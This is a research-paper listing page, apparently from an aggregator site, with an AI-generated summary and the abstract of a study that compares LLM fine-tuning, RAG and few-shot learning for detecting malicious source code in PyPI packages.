Detecting Malicious Source Code in PyPI Packages with LLMs: Does RAG Come in Handy?

📅 2025-04-18

📈 Citations: 0

✨ Influential: 0

🤖 AI Summary

The growing prevalence of malicious packages in the PyPI ecosystem poses significant challenges for detection, particularly due to the scarcity of high-quality labeled data and structured security knowledge. Method: This paper proposes an LLM-driven detection framework that synergistically integrates few-shot learning with domain-specific knowledge—departing from conventional RAG paradigms. It combines fine-tuned LLMs, a YARA rule engine, GitHub Security Advisories, and retrieval of known malicious code fragments to construct a structured security knowledge base, and orchestrates a hybrid AI analysis pipeline. Contribution/Results: Empirical evaluation reveals that few-shot prompting significantly outperforms RAG in fine-grained malicious source code identification (+12.3% balanced accuracy), exposing RAG’s inherent limitations in deep code semantics understanding. Evaluated on a cross-version real-world PyPI dataset, the method achieves 97% accuracy and 95% balanced accuracy, demonstrating the efficacy of few-shot learning for low-resource malicious package detection and offering a novel pathway for open-source supply chain security.

Technology Category

Application Category

📝 Abstract

Malicious software packages in open-source ecosystems, such as PyPI, pose growing security risks. Unlike traditional vulnerabilities, these packages are intentionally designed to deceive users, making detection challenging due to evolving attack methods and the lack of structured datasets. In this work, we empirically evaluate the effectiveness of Large Language Models (LLMs), Retrieval-Augmented Generation (RAG), and few-shot learning for detecting malicious source code. We fine-tune LLMs on curated datasets and integrate YARA rules, GitHub Security Advisories, and malicious code snippets with the aim of enhancing classification accuracy. We came across a counterintuitive outcome: While RAG is expected to boost up the prediction performance, it fails in the performed evaluation, obtaining a mediocre accuracy. In contrast, few-shot learning is more effective as it significantly improves the detection of malicious code, achieving 97% accuracy and 95% balanced accuracy, outperforming traditional RAG approaches. Thus, future work should expand structured knowledge bases, refine retrieval models, and explore hybrid AI-driven cybersecurity solutions.

Problem

Research questions and friction points this paper is trying to address.

Detecting malicious PyPI packages using LLMs and RAG

Evaluating few-shot learning for improved malicious code detection

Addressing challenges in structured datasets for cybersecurity

Innovation

Methods, ideas, or system contributions that make the work stand out.

Fine-tuned LLMs on curated datasets

Integrated YARA rules and GitHub advisories

Few-shot learning outperformed RAG accuracy

🔎 Similar Papers

No similar papers found.

Authors to Follow